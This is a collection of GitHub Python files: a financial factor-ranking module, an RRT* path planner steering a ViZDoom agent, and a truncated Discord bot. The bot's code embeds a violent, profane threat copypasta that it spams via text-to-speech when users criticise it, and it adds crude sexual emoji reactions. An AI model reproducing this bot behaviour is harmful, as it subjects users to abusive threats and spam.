Returns:\n a numpy 2D array (shape=(4,1)) of BEST performing company.\n\n Raises:\n TypeError: assess type of param Factor.\n \"\"\"\n _instance_check(Factor, str) # raise TypeError\n\n df = _get_df(Factor)\n _gc.collect()\n return _np.array(df.idxmax(), dtype=str) # df.idxmax()\n\n\ndef worst(Factor):\n \"\"\"Get the WORST performing company of a factor.\n\n Args:\n Factor: str - One factor in database.\n\n Returns:\n a numpy 2D array (shape=(4,1)) of WORST performing company\n\n Raises:\n TypeError: assess type of param Factor.\n \"\"\"\n _instance_check(Factor, str) # raise TypeError\n\n df = _get_df(Factor)\n _gc.collect()\n return _np.array(df.idxmin(), dtype=str)\n\n\ndef _get_df(Factor):\n \"\"\"Opens the factor data cache csv file\n\n Opens the factor data csv, get if update in stocks in database exists from _is_updated()\n call database cache update if needed.\n\n Args:\n Factor: str - One factor in database.\n\n Returns:\n a pandas DataFrame with ticket names (rows) vs ['0', '1', '2', '3'] (columns name).\n \"\"\"\n # NOT THE SAME as jaqk.open_file or jaqk.open_general\n try:\n # using cache\n df = _pd.read_csv(_os.path.join(_datapath(), 'general', '_'.join(Factor.split(' ')) + '.csv'), index_col=0)\n b, diff = _is_updated(df) # check update, b -> boolean\n if b is False:\n pass\n else:\n df_new = _percentile_core(Factor, diff, update=b)\n df = _update_old_one(df_new, df, Factor) # perform update on cache csv file\n except FileNotFoundError:\n df = _percentile_core(Factor) # indicate factor has no cache in database\n return df\n\n\ndef _percentile_core(Factor, diff=None, update=False):\n \"\"\"Gets factor data when factor cache doesn't exist\n\n Iterate through company list, opens corresponding report and locate the factor,\n put factor data of each company in one row of final pandas DataFrame file.\n\n Args:\n Factor: str - One factor in database.\n diff: set/list - tickets that need update, passed into _needs_update().\n update: bool - is there tickets update or not, update factor data cache if yes.\n\n Returns:\n a pandas DataFrame with tickets (rows) vs ['0', '1', '2', '3'] (columns),\n contains number of the param Factor of each company in database.\n\n Raises:\n ValueError: check if Factor is in either database or calculations.\n \"\"\"\n # NOT STABLE YET; EMPTY STACK OCCURS OCCASIONALY\n\n flag = False\n # _factor_dic: all calculated factors that are not in the original csv sheets\n _factor_dic = {'FCF': 'cash_flow', 'IC': 'balance', 'NIBCLS': 'balance', 'Invested_Book_Capital': 'balance'}\n\n try:\n name = _path(Factor)\n except ValueError:\n if Factor in _factor_dic.keys(): # calculated factors\n flag = True\n name = _factor_dic[Factor]\n else:\n msg = \"No support for factor '{}'\"\n raise ValueError(msg.format(Factor))\n\n d = _needs_update(diff) # tickets needed to to iterate through\n r = []\n d2 = d[:]\n for i in d2:\n try:\n if flag: # calculated factors\n exec('from ..factors.{} import {} as {}'.format(name, Factor, Factor)) # call calculations functions\n f = eval(Factor + '(i)')\n else:\n df = _open_file(i, name)\n f = _factor(df, Factor)\n if len(f) != 4 and name in ['income', 'balance', 'cash_flow']:\n d.remove(i)\n continue\n else:\n r.append(f)\n except Exception as e: # drops the company with whatever problem\n d.remove(i)\n _write_error(i) # record the error in a txt file\n\n if len(r) == 0:\n return None\n\n n = _np.stack(r)\n assert len(n) == len(d)\n df = _pd.DataFrame(n, index=d)\n df.columns = [str(i) for i in list(df)]\n if not update: # if cache not exist\n _save_csv(df, Factor)\n del d, r, d2, n\n _gc.collect()\n return df\n\n\ndef _is_updated(df): # only for rankings\n \"\"\"Check if there's any updated tickets in database.\n\n Read the index (tickets) of df, compare it with database tickets.\n\n Args:\n df: pandas DataFrame of factor data cache in database.\n\n Returns:\n bool: whether there's update or not.\n diff: set - the new tickets name in database.\n \"\"\"\n index = df.index.tolist()\n try:\n # Read error txt (baby version of log), record into a list\n f = open(_os.path.join(_datapath(), 'general', 'error_cache.txt'))\n er = f.read().split('\\n')\n f.close()\n except FileNotFoundError:\n er = []\n index = set(index + er) # original database\n dirs = set(_os.listdir(_datapath())) # current database\n diff = dirs.difference(index) # finding differences\n if len(diff) == 0:\n return False, {}\n else:\n return True, diff # returns a set\n\n\ndef _write_error(i):\n \"\"\"Record the companies with errors so in future such tickets won't be updated agrain\n\n Read erorrs into a list, then write the new error ticket\n\n Args:\n i: int - the counter in for loop in _percentile_core()\n\n Returns:\n None\n \"\"\"\n path = _os.path.join(_datapath(), 'general', 'error_cache.txt')\n try:\n with open(path) as w:\n f = set(w.readlines())\n except FileNotFoundError:\n f = set()\n f.update({i}) # update as set([i])\n with open(path, 'w+') as e:\n e.write('\\n'.join(f))\n\n\ndef _needs_update(diff):\n \"\"\"Get the tickets that need to be updated with factors data in factors data cache.\n\n Args:\n diff: set - tickets that need update from _is_updated(), passed in through _percentile_core().\n\n Returns:\n list of ticket names that need to be updated\n \"\"\"\n if diff is None:\n dirs = _os.listdir(_datapath()) # update everything\n d = [i for i in dirs if _os.path.isdir(_os.path.join(_datapath(), i))] # eliminate non-directory files\n else:\n d = list(diff)\n return d\n\n\ndef _update_old_one(df_new, df_old, Factor):\n \"\"\"Update the existing factors data cache in database.\n\n Call _save_csv() to save the new DataFrame.\n\n Args:\n df_new: new DataFrame generated in _percentile_core().\n df_old: old DataFrame derived from database.\n Factor: str - One factor in database.\n\n Returns:\n pandas DataFrame with all companies updated for param Factor\n \"\"\"\n # print('_update_old_one')\n df = _pd.concat((df_old, df_new), sort=False)\n _save_csv(df, Factor)\n return df\n\n\ndef _save_csv(df, Factor):\n \"\"\"Save DataFrame into csv file in database.\n\n Args:\n df: pandas DataFrame.\n Factor: str - One factor in database.\n\n Returns:\n None\n \"\"\"\n df.to_csv(_os.path.join(_datapath(), 'general', '_'.join(Factor.split(' ')) + '.csv'))\n\n\ndef _datapath(setup=True):\n \"\"\"\n The global datapath for all other file. It sets your selected path in jaqk.setup() as the main datapath, and all data will be added/deleted from there.\n \"\"\"\n try:\n p = _os.path.abspath(_os.path.join(_os.path.dirname(__file__), _os.pardir))\n with open(_os.path.join(p, 'setup_cache.txt')) as w:\n path = w.read()\n if setup is True:\n return path\n else:\n return _os.path.join(p, 'database')\n except FileNotFoundError:\n return _os.path.join(p, 'database')\n\n\ndef _instance_check(param, dtype):\n msg = \"Parameter '{}' should a string, not a {}.\"\n if not isinstance(param, dtype):\n dtype = type(param).__name__\n raise TypeError(msg.format(str(param), dtype))\n\n\ndef _value_check(p):\n # print(\"_check_percentage\")\n msg = \"Parameter 'percentage' should be in the interval [0, 100]. Try {} instead.\"\n if 0 < p < 1:\n m = 100 if p * 100 > 100 else p * 100\n raise ValueError(msg.format(m))\n elif p > 100:\n m = 100 if p / 100 > 100 else round(p / 100, 2)\n raise ValueError(msg.format(m))\n\n\ndef _CAGR(Factor, years): # compound anual growth rate, not developed\n pass\n","repo_name":"Haannbboo/JAQK","sub_path":"build/lib/jaqk/calculations/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":10610,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"74552914704","text":"import os\n\nfrom time import sleep\nimport vizdoom as vzd\n\n\n\nimport sys, random, math, pygame\nfrom pygame.locals import *\nfrom math import sqrt, cos, sin, atan2\nimport cv2\nimport numpy as np\n\n# constants\nXDIM = 637\nYDIM = 480\nWINSIZE = [XDIM, YDIM]\nstepsize = 4.0\nNUMNODES = 60000\nRADIUS = 10\n\ndef dist(p1, p2):\n return sqrt((p1[0] - p2[0]) * (p1[0] - p2[0]) + (p1[1] - p2[1]) * (p1[1] - p2[1]))\n\ndef step_from_to(p1, p2):\n if dist(p1, p2) < stepsize:\n return p2\n else:\n theta = atan2(p2[1] - p1[1], p2[0] - p1[0])\n return p1[0] + stepsize * cos(theta), p1[1] + stepsize * sin(theta)\n\n\ndef chooseParent(nn, newnode, nodes):\n for p in nodes:\n if dist([p.x, p.y], [newnode.x, newnode.y]) < RADIUS and p.cost + dist([p.x, p.y],\n [newnode.x, newnode.y]) < nn.cost + dist(\n [nn.x, nn.y], [newnode.x, newnode.y]):\n nn = p\n newnode.cost = nn.cost + dist([nn.x, nn.y], [newnode.x, newnode.y])\n newnode.parent = nn\n return newnode, nn\n\n\ndef reWire(nodes, newnode, pygame, screen):\n white = 255, 240, 200\n black = 20, 20, 40\n for i in range(len(nodes)):\n p = nodes[i]\n if p != newnode.parent and dist([p.x, p.y], [newnode.x, newnode.y]) < RADIUS and newnode.cost + dist([p.x, p.y],\n [newnode.x,\n newnode.y]) < p.cost:\n pygame.draw.line(screen, white, [p.x, p.y], [p.parent.x, p.parent.y])\n p.parent = newnode\n p.cost = newnode.cost + dist([p.x, p.y], [newnode.x, newnode.y])\n nodes[i] = p\n pygame.draw.line(screen, black, [p.x, p.y], [newnode.x, newnode.y])\n return nodes\n\n\ndef drawSolutionPath(start, goal, nodes, pygame, screen):\n pink = 200, 20, 240\n nn = nodes[0]\n for p in nodes:\n if dist([p.x, p.y], [goal.x, goal.y]) < dist([nn.x, nn.y], [goal.x, goal.y]):\n nn = p\n if dist([nn.x,nn.y],[goal.x,goal.y])>20:\n print(\"path not found\")\n return\n while nn != start:\n path.append((nn.x,nn.y))\n pygame.draw.line(screen, pink, [nn.x, nn.y], [nn.parent.x, nn.parent.y], 5)\n nn = nn.parent\n\ndef isInObstacle(vex, obstacles):\n if vex.y < 0 or vex.y > 477:\n return True\n if vex.x < 0 or vex.x > 634:\n return True\n # for x,y in corners :\n # if sqrt((vex.x-x)**2 + (vex.y-y)**2)<=2:\n # return True\n alpha = math.floor(vex.y)\n beta = math.floor(vex.x)\n if (obstacles[alpha][beta] == 0 or obstacles[alpha + 1][beta] == 0 or obstacles[alpha - 1][beta] == 0 or\n obstacles[alpha][beta + 1] == 0 or obstacles[alpha][beta - 1] == 0 ):\n return True\n return False\n\n\ndef isThruObstacle(p0,p1, obstacles):\n xm = int((p0[0] + p1[0]) / 2)\n ym = int((p0[1] + p1[1]) / 2)\n if ym < 0 or ym >= 480:\n return True\n if xm < 0 or xm >= 637:\n return True\n if obstacles[ym][xm] == 0:\n return True\n xm1 = int((p0[0] + xm) / 2)\n ym1 = int((p0[1] + ym) / 2)\n if obstacles[ym1][xm1] == 0:\n return True\n xm2 = int((p1[0] + xm) / 2)\n ym2 = int((p1[1] + ym) / 2)\n if obstacles[ym2][xm2] == 0:\n return True\n if ((p1[0] - p0[0]) != 0):\n m = (p1[1] - p0[1]) / (p1[0] - p0[0])\n # for x,y in corners :\n # if(abs((y-p0[1]-m*(x-p0[0])))/(sqrt(1+m**2))<=2):\n # return True\n step = 0\n if (p1[0] > p0[0]):\n step = 1\n else:\n step = -1\n xcoord = p0[0]\n ycoord = p0[1]\n i = 1\n while ((xcoord < p1[0] and step > 0) or (xcoord > p1[0] and step < 0)):\n xcoord += step\n ycoord += m\n if (isInObstacle(Node(xcoord, ycoord), obstacles)):\n return True\n else:\n step = 0\n if (p1[1] - p0[1] >= 0):\n step = 1\n else:\n step = -1\n ycoord = p0[1]\n while ((ycoord < p1[1] and step > 0) or (ycoord > p1[1] and step < 0)):\n ycoord += step\n if (isInObstacle(Node(p0[0], ycoord), obstacles)):\n return True\n return False\n\n\nclass Node:\n x = 0\n y = 0\n cost = 0\n parent = None\n\n def __init__(self, xcoord, ycoord):\n self.x = xcoord\n self.y = ycoord\n\ndef main():\n\n pygame.init()\n screen = pygame.display.set_mode(WINSIZE)\n pygame.display.set_caption('RRTstar')\n\n white = 255, 240, 200\n black = 20, 20, 40\n screen.fill(white)\n\n nodes = []\n\n\n nodes.append(Node(449., 214.))\n start = nodes[0]\n goal = Node(494., 367.)\n for i in range(NUMNODES):\n rand = Node(random.random() * XDIM, random.random() * YDIM)\n nn = nodes[0]\n for p in nodes:\n if dist([p.x, p.y], [rand.x, rand.y]) < dist([nn.x, nn.y], [rand.x, rand.y]):\n nn = p\n interpolatedNode = step_from_to([nn.x, nn.y], [rand.x, rand.y])\n\n\n newnode = Node(interpolatedNode[0], interpolatedNode[1])\n if isInObstacle(newnode,obstacles):\n continue\n [newnode, nn] = chooseParent(nn, newnode, nodes)\n if isThruObstacle((newnode.x,newnode.y),(nn.x,nn.y),obstacles) :\n continue\n\n nodes.append(newnode)\n pygame.draw.line(screen, black, [nn.x, nn.y], [newnode.x, newnode.y])\n nodes = reWire(nodes, newnode, pygame, screen)\n pygame.display.update()\n\n\n for e in pygame.event.get():\n if e.type == QUIT or (e.type == KEYUP and e.key == K_ESCAPE):\n sys.exit(\"Leaving because you requested it.\")\n drawSolutionPath(start, goal, nodes, pygame, screen)\n for i in range(len(path) - 1):\n cv2.line(img, (int(path[i][0]), int(path[i][1])), (int(path[i + 1][0]), int(path[i + 1][1])), (0, 255, 255), 1)\n pygame.display.update()\n cv2.imshow(\"Final Path\", img)\n cv2.imwrite(\"path.jpg\",img)\n cv2.waitKey(0)\n\ndef f0(a,b) :\n if(abs(a-b)<5):\n return True\n return False\ndef f2(a,b) :\n if(abs(a-b)<5):\n return True\n return False\n\ndef f1(a,b) :\n if(abs(a-b)<0.5):\n return True\n return False\n\n\nif __name__ == '__main__':\n img = cv2.imread(\"map_fu.png\")\n\n imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n path=[]\n\n blur = cv2.GaussianBlur(imgray, (3, 3), 0)\n ret, thresh = cv2.threshold(blur, 2, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n\n obstacles = thresh\n corner = cv2.goodFeaturesToTrack(obstacles, 200, 0.01, 10)\n corner = np.int0(corner)\n corners = []\n\n\n\n main()\n path.append((449., 214.))\n path.reverse()\n path.append((494., 367.))\n\n\n running = True\n while running:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n\n\n game = vzd.DoomGame()\n\n\n game.set_doom_scenario_path(os.path.join(vzd.scenarios_path, \"s.wad\"))\n\n\n game.set_doom_map(\"map01\")\n\n\n game.set_screen_resolution(vzd.ScreenResolution.RES_640X480)\n\n\n game.set_screen_format(vzd.ScreenFormat.BGR24)\n\n\n\n\n game.set_automap_buffer_enabled(True)\n game.set_automap_mode(vzd.AutomapMode.OBJECTS)\n\n\n game.set_objects_info_enabled(True)\n\n\n game.set_sectors_info_enabled(True)\n\n\n game.set_render_hud(False)\n game.set_render_minimal_hud(False)\n game.set_render_crosshair(False)\n game.set_render_weapon(True)\n game.set_render_decals(False)\n game.set_render_particles(False)\n game.set_render_effects_sprites(False)\n game.set_render_messages(False)\n game.set_render_corpses(False)\n game.set_render_screen_flashes(True)\n\n\n game.set_available_buttons([vzd.Button.MOVE_FORWARD, vzd.Button.TURN_LEFT, vzd.Button.TURN_RIGHT,vzd.Button.MOVE_LEFT,vzd.Button.MOVE_RIGHT])\n\n print(\"Available buttons:\", [b.name for b in game.get_available_buttons()])\n\n\n game.set_available_game_variables([vzd.GameVariable.AMMO2])\n print(\"Available game variables:\", [v.name for v in game.get_available_game_variables()])\n\n\n game.set_episode_timeout(2500)\n\n\n game.set_episode_start_time(10)\n\n\n game.add_available_game_variable(vzd.GameVariable.POSITION_X)\n game.add_available_game_variable(vzd.GameVariable.POSITION_Y)\n game.add_available_game_variable(vzd.GameVariable.ANGLE)\n game.set_window_visible(True)\n\n\n\n\n game.set_living_reward(-1)\n\n\n game.set_mode(vzd.Mode.PLAYER)\n\n\n\n\n game.init()\n if(len(path)==2):\n game.close()\n\n\n actions = [[True, False, False,False,False], [False, True, False,False,False], [False, False, True,False,False],[False, False, False,True,False],[False, False, False,False,True]]\n\n\n episodes = 1\n\n c = 10.99853611\n\n prev_angle=0\n prev_x=0\n prev_y=0\n prev2_x=0\n prev2_y=-64\n i=0\n\n\n sleep_time = 1.0 / vzd.DEFAULT_TICRATE # = 0.028\n\n for i in range(episodes):\n print(\"Episode #\" + str(i + 1))\n\n\n game.new_episode()\n sum = 0\n\n\n x1=0\n y1=-64\n\n p=0\n\n for x,y in path:\n\n\n x=(x-449)*c\n y=(214-y)*c-64\n\n if(x==449 and y==214):\n x1=0\n y1=-64\n continue\n\n\n while f0(x1,x)==False or f0(y,y1)==False :\n\n state = game.get_state()\n\n\n n = state.number\n vars = state.game_variables\n screen_buf = state.screen_buffer\n depth_buf = state.depth_buffer\n labels_buf = state.labels_buffer\n automap_buf = state.automap_buffer\n labels = state.labels\n objects = state.objects\n sectors = state.sectors\n\n\n\n\n\n\n an= atan2(y-vars[2] , x-vars[1] )\n ang= math.degrees(an)\n if(ang<0):\n ang= ang +360\n\n p = vars[1]\n q = vars[2]\n l=0\n r=0\n if vars[3] 0:\n sleep(sleep_time)\n\n\n print(\"Episode finished.\")\n print(\"Total reward:\", game.get_total_reward())\n print(\"************************\")\n\n\n game.close()","repo_name":"OmSadhwani/AGV-selection-tasks","sub_path":"RRT/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":11745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28484771556","text":"# -----------------------------------------------------------------------\r\n# Cli-Bot - discord bot dedicated to shit posting and other fun\r\n# Authors: WhiteTrick\r\n# Contributors: v0idbit\r\n# -----------------------------------------------------------------------\r\n# import packages\r\nimport discord\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import bot # discord API\r\nfrom discord import opus\r\nimport logging # used for logging errors\r\nfrom math import e\r\nimport matplotlib.pyplot as plt\r\nimport numexpr as ne\r\nimport numpy as np\r\n# import opus #necessary for using voice channel\r\nfrom random import randint # generate pseudorandom numbers\r\nimport re\r\nimport os\r\nimport string\r\nimport asyncio\r\nfrom functools import reduce\r\n\r\n# -----------------------------------------------------------------------\r\nmarine1 = \"What the fuck did you just fucking say about me, you little bitch?\"\r\nmarine2 = \"I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous \" \\\r\n \"secret raids on Al-Quaeda, and I have over 300 confirmed kills. \"\r\nmarine3 = \"I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to \" \\\r\n \"me but just another target. \"\r\nmarine5 = \"I will wipe you the fuck out with precision the likes of which has never been seen before on this Earth, \" \\\r\n \"mark my fucking words. \"\r\nmarine4 = 'You think you can get away with saying that shit to me over the Internet?'\r\nmarine5 = \"Think again, fucker. As we speak I am contacting my secret network of spies across the USA and your IP is \" \\\r\n \"being traced right now so you better prepare for the storm, maggot. \"\r\nmarine6 = \"The storm that wipes out the pathetic little thing you call your life.\"\r\nmarine7 = \"You’re fucking dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, \" \\\r\n \"and that’s just with my bare hands. \"\r\nmarine8 = \"Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United \" \\\r\n \"States Marine Corps \"\r\nmarine9 = \"and I will use it to its full extent to wipe your miserable ass off the face of the continent, you little \" \\\r\n \"shit. \"\r\nmarine10 = 'If only you could have known what unholy retribution your little “clever” comment was about to bring down ' \\\r\n 'upon you, maybe you would have held your fucking tongue. '\r\nmarine11 = \"But you couldn’t, you didn’t, and now you’re paying the price, you goddamn idiot. I will shit fury all \" \\\r\n \"over you and you will drown in it. You’re fucking dead, kiddo. \"\r\nmarinepasta = [marine1, marine2, marine3, marine4, marine5, marine6, marine7, marine8, marine9, marine10, marine11]\r\n\r\n# set logging level: logs to Command Line Interface\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\n# instantiate client\r\nclibot = discord.Client(max_messages=10000)\r\n\r\nOPUS_LIBS = ['libopus-0.x86.dll', 'libopus-0.x64.dll', 'libopus-0.dll',\r\n 'libopus.so.0', 'libopus.0.dylib']\r\n\r\n\r\ndef GCD(a, b):\r\n if (a < b):\r\n A = a\r\n R = B = b\r\n else:\r\n A = b\r\n R = B = a\r\n while (R != 0):\r\n R = A % B\r\n if (R == 0):\r\n return B\r\n A = B\r\n B = R\r\n\r\n\r\nremove_punctuation = str.maketrans('', '', string.punctuation)\r\n\r\n\r\ndef load_opus_lib(opus_libs=OPUS_LIBS):\r\n \"\"\"\tloads opus lib\t\"\"\"\r\n if opus.is_loaded():\r\n return True\r\n\r\n for opus_lib in opus_libs:\r\n try:\r\n opus.load_opus(opus_lib)\r\n return\r\n except OSError:\r\n pass\r\n\r\n raise RuntimeError('Could not load an opus lib. Tried %s' % (', '.join(opus_libs)))\r\n\r\n\r\nbot = commands.Bot(command_prefix='#')\r\n\r\n# initialize game that Clibot will be playing\r\nplaying_game = discord.Game(name=\"with myself\")\r\n\r\n\r\n# global voice\r\n# global player\r\n\r\n@clibot.event\r\nasync def on_ready():\r\n \"\"\"\tcalled when clibot finishes preparing data received from Discord\t\"\"\"\r\n print('Logged in as')\r\n print(clibot.user.name)\r\n print(clibot.user.id)\r\n print('--------')\r\n print('invite URL')\r\n print(discord.utils.oauth_url('352256816790503425'))\r\n load_opus_lib()\r\n await clibot.change_presence(game=playing_game)\r\n\r\n\r\n'''\r\n\r\n'''\r\n\r\n\r\n@bot.command(pass_context=True)\r\nasync def gcd(ctx, arg):\r\n mytuple = tuple([int(word) for word in arg.translate(remove_punctuation).split(\" \")])\r\n output = reduce(GCD, mytuple)\r\n embed = discord.Embed(color=0x00ff00)\r\n embed.add_field(name=\"Greatest Common Denominator\", value=\"GCD{} = {}\".format(mytuple, output))\r\n await clibot.send_message(ctx.message.channel, embed=embed)\r\n\r\n\r\n@clibot.event\r\nasync def on_message_delete(message):\r\n \"\"\"\tcalled when a message is deleted. Keyword arguments:\tmessage -- the message (object) deleted \"\"\"\r\n if len(message.content) > 0 and message.author.name != \"cli-bot\":\r\n author = message.author.name\r\n content = message.clean_content\r\n print('{}\\'s message \"*{}*\" was deleted.'.format(author, content))\r\n\r\n\r\n@clibot.event\r\nasync def on_message(message):\r\n await bot.process_commands(message)\r\n spongerob = randint(1, 100)\r\n kisses = randint(1, 100)\r\n if (len(message.content) > 0 and spongerob == 1\r\n and message.author.name != \"cli-bot\"):\r\n # 1% chance of cli-bot mocking a non-blank message, given\r\n # it's not from cli-bot itself\r\n msg = message.clean_content\r\n print(msg)\r\n new_msg = list(msg)\r\n\r\n for i in range(0, len(msg)):\r\n # iterates over the message as a char array and swaps the\r\n # case of alpha characters ~67% of the time\r\n r = randint(1, 3)\r\n if r <= 2:\r\n if new_msg[i].isupper():\r\n # swap from upper to lower\r\n new_msg[i] = new_msg[i].lower()\r\n else:\r\n # swap from lower to upper\r\n new_msg[i] = new_msg[i].upper()\r\n\r\n new_msg = \"\".join(new_msg) # joins char array back into string\r\n file = './spongerob.jpg'\r\n await clibot.send_file(message.channel, file,\r\n content=new_msg, tts=True)\r\n if (len(message.content) > 0 and (kisses in range(1, 4))\r\n and message.author.name != \"cli-bot\"):\r\n await clibot.add_reaction(message, '\\U0001F48b')\r\n\r\n if re.search(r'cunt', message.content, re.I) and message.author.name != 'cli-bot':\r\n # adds some much needed emphasis to messages including the word\r\n # \"cunt\"\r\n await clibot.add_reaction(message, '\\U0001F1E8')\r\n await clibot.add_reaction(message, '\\U0001F1FA')\r\n await clibot.add_reaction(message, '\\U0001F1F3')\r\n await clibot.add_reaction(message, '\\U0001F1F9')\r\n\r\n # if (any(word in ['cli', 'clibot', 'cli-bot'] for word in\r\n # message.content.lower().translate(remove_punctuation).split())\r\n # and message.author.name != \"cli-bot\"):\r\n if re.search(r\"cli\", message.content, re.I) and message.author.name != \"cli-bot\":\r\n if re.search(r\"l[ou]v\", message.content, re.I):\r\n await clibot.add_reaction(message, '\\U0001F633')\r\n if re.search(r\"hate|h8|fuck you\", message.content, re.I):\r\n await clibot.add_reaction(message, emoji=':absoluteshit:296132005203148800')\r\n for marine in marinepasta:\r\n await clibot.send_message(message.channel, marine, tts=True)\r\n if (\r\n any(word in ['annoy', 'annoying'] for word in\r\n message.content.lower().translate(remove_punctuation).split())):\r\n await clibot.add_reaction(message, '😘')\r\n\r\n if re.match(r\".*sex.*|.*fuck.*|.*penetra.*\", message.content, re.I) and message.author.name != \"cli-bot\":\r\n await clibot.add_reaction(message, '👉🏿')\r\n await clibot.add_reaction(message, '👌🏻')\r\n\r\n # if ('better' in message.content.lower().translate(remove_punctuation).split()\r\n # and 'idea' in message.content.lower().translate(remove_punctuation).split()\r\n if re.search(r\"better.*idea|idea.*better\", message.content, re.I) and message.author.name != \"cli-bot\":\r\n await clibot.add_reaction(message, emoji=':helno:370408318352490496')\r\n\r\n # if ('make you jizz' in message.content.lower().translate(remove_punctuation) and message.author.name != 'cli-bot'):\r\n if re.search(r\"make you jizz\", message.content, re.I):\r\n await clibot.send_message(message.channel, 'cuzzi with me tonight')\r\n\r\n matchObj = re.match(r'^cli-plot ([^=]+)=([\\d\\+\\-\\*\\%/\\^()\\.[a-zA-Z]+);?\\s?(xlab=\\'[^,]*\\')?,?\\s?(ylab=\\'[^,]*\\')?,?\\s?(title=\\'[^,]*\\')?,?\\s?(range\\(([\\+\\-]?[(\\d*\\.?\\d*)|(\\d*)]{1,}),\\s?([\\+\\-]?[(\\d*\\.?\\d*)|(\\d*)]{1,})\\))?,?\\s?(--autoscale)?$', message.content, re.I)\r\n if matchObj:\r\n # cli-plot event\r\n # cli-plot =; xlab='